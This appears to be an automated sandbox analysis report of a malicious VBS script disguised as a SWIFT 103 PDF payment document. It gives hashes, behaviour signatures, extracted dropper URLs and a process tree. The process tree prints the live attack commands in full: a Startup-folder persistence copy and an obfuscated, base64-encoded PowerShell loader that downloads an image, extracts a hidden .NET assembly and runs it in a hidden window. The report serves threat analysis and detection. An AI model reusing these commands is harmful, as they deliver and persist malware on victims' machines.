Analysis

  • max time kernel
    21s
  • max time network
    25s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    09-10-2024 12:13

General

  • Target

    SWIFT 103 202410071251443120 071024-pdf.vbs

  • Size

    192KB

  • MD5

    0f65fc79f42cc4c38a78b4c38411e98f

  • SHA1

    4b6432ade0231ca6849a30f1ab88e4bf2419ace5

  • SHA256

    162bc0224d6edb13077ab6483e8e7d507a6a4805945a9758595f57028f5683d8

  • SHA512

    cd13f395e20fcc247015ae12da6dd653d810258e0b83a8ee8fb6eaba9213eba7fda9d0cc027b93ec5d2e81f44fe4c4ae53ed403dddba91cd46f374a72ffc5112

  • SSDEEP

    3072:C5XV+GVQUD9JyGdr9blygBDgt5ptGwOnCL53EBmC75o6dIY2lruQ:CbDBDGGp9bSomC75o6d2liQ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20

exe.dropper

https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Drops startup file 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202410071251443120 071024-pdf.vbs"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:2980
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202410071251443120 071024-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.omsicilotac.vbs')')
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:2704
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 10
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2360
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202410071251443120 071024-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.omsicilotac.vbs')')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2820
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRzaGVMTGlkWzFdKyRzSGVsTGlEWzEzXSsnWCcpKCgoJ2loTmltYWdlVXJsID0gaW9FaHR0cHM6Ly9pYTYwMDEwMi51cy5hcmNoaXZlLm9yZy8zMi9pdGVtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RldGFoTicrJ290ZV9WLmpwZyBpb0U7aWhOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtpaE5pbWFnZUJ5dGVzID0gaWhOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShpaE5pbWFnZVVybCcrJyk7aWhOaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoaWhOaW1hZ2VCeXRlcyk7aWhOc3RhcnRGbGFnID0gaW9FPDxCQVNFNjRfU1RBUlQ+PmlvRTtpaE4nKydlbmRGbGFnID0nKycgaW9FPDxCQVNFNjRfRU5EPj5pb0U7aWhOc3RhcnRJbmRleCA9IGloTmltJysnYWdlVGV4dC5JbmRleE8nKydmKGloTnN0YXJ0RmxhZyk7aWhOZW5kSW5kZXggPSBpaCcrJ05pbWFnZVRleHQuSW5kZXhPZihpaE5lbmRGbGFnKTtpaE5zdGFydEluZGV4IC1nZSAwIC1hbmQgaScrJ2hOZW5kSW5kZXggLWd0IGloTnN0YXJ0SW5kZXg7aWhOc3RhcnRJbmRleCArPSBpaE5zdGFydEZsYWcuTGVuZ3RoO2loTmJhc2U2NExlbmd0aCA9IGloTmVuZEluZGV4IC0gaWhOc3RhcnRJbmRleDtpaCcrJ05iYXNlNjRDb21tYW5kID0gaWhOaW1hZ2VUZXh0LlN1YnN0cmluZyhpaCcrJ05zdGFydEluZGV4LCBpaE5iYXNlNjRMZW5ndGgpO2loTmNvbW1hbmRCeXRlcyAnKyc9IFtTeXN0ZW0uQ29udmVydF06OkYnKydyb21CYXNlNjRTdHJpbmcoaWhOYmFzZTY0Q29tbWFuZCk7aWhObG9hZGUnKydkQXNzZW0nKydibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGloTmNvbScrJ21hbmRCeXRlcyk7aWhOdmFpTWV0aG9kID0gW2RubGliLklPLkgnKydvbWVdLkdldCcrJ01ldGhvZChpb0VWQUlpb0UpO2loTnZhaU1ldGhvZC5JbnZva2UoaWhObnVsbCwgQChpb0UwL2Z4RXVQL2QvZWUuZXRzYXAvLzpzcCcrJ3R0aGlvRSwgaW9FZGVzYXRpdmFkb2lvRSwgaW9FZGVzJysnYXRpdmFkb2lvRSwgaW9FZGVzYXRpdmFkb2lvRSwgaW9FQWRkSW5Qcm8nKydjZXNzMzJpb0UsIGlvRWRlc2F0aXZhZG9pb0UsIGlvRWRlc2F0aXZhZG9pb0UpKTsnKSAtY3JlcExBQ0UnaWhOJyxbY2hhUl0zNi1yRVBsYWNFICAnaW9FJyxbY2hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2780
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $sheLLid[1]+$sHelLiD[13]+'X')((('ihNimageUrl = ioEhttps://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahN'+'ote_V.jpg ioE;ihNwebClient = New-Object System.Net.WebClient;ihNimageBytes = ihNwebClient.DownloadData(ihNimageUrl'+');ihNimageText = [System.Text.Encoding]:'+':UTF8.GetString(ihNimageBytes);ihNstartFlag = ioE<<BASE64_START>>ioE;ihN'+'endFlag ='+' ioE<<BASE64_END>>ioE;ihNstartIndex = ihNim'+'ageText.IndexO'+'f(ihNstartFlag);ihNendIndex = ih'+'NimageText.IndexOf(ihNendFlag);ihNstartIndex -ge 0 -and i'+'hNendIndex -gt ihNstartIndex;ihNstartIndex += ihNstartFlag.Length;ihNbase64Length = ihNendIndex - ihNstartIndex;ih'+'Nbase64Command = ihNimageText.Substring(ih'+'NstartIndex, ihNbase64Length);ihNcommandBytes '+'= [System.Convert]::F'+'romBase64String(ihNbase64Command);ihNloade'+'dAssem'+'bly = [System.Reflection.Assembly]::Load(ihNcom'+'mandBytes);ihNvaiMethod = [dnlib.IO.H'+'ome].Get'+'Method(ioEVAIioE);ihNvaiMethod.Invoke(ihNnull, @(ioE0/fxEuP/d/ee.etsap//:sp'+'tthioE, ioEdesativadoioE, ioEdes'+'ativadoioE, ioEdesativadoioE, ioEAddInPro'+'cess32ioE, ioEdesativadoioE, ioEdesativadoioE));') -crepLACE'ihN',[chaR]36-rEPlacE 'ioE',[chaR]39))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2792

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    614fc9c8545246be81223f010b09e680

    SHA1

    13aaa296534f69bb35d1df21b1af92cf122b7ebb

    SHA256

    f944420108b5c100e608502faf14d8d7fcdc76a50b7cf0e48700c8f2a22bbcc2

    SHA512

    3d8ef5e11a56aabb9a20703308b7a608f1dbaa92b3981bda514c5ea660279df4df61ca082e4ae73a4632ce81dc21760a712b5eaa0839eeb34ba7f775f482b7ef

  • memory/2780-19-0x000000001B270000-0x000000001B552000-memory.dmp

    Filesize

    2.9MB

  • memory/2780-20-0x0000000002560000-0x0000000002568000-memory.dmp

    Filesize

    32KB

  • memory/2820-5-0x000007FEF5EFE000-0x000007FEF5EFF000-memory.dmp

    Filesize

    4KB

  • memory/2820-6-0x000000001B1E0000-0x000000001B4C2000-memory.dmp

    Filesize

    2.9MB

  • memory/2820-7-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2820-8-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2820-10-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2820-9-0x0000000002310000-0x0000000002318000-memory.dmp

    Filesize

    32KB

  • memory/2820-11-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2820-12-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2820-13-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

    Filesize

    9.6MB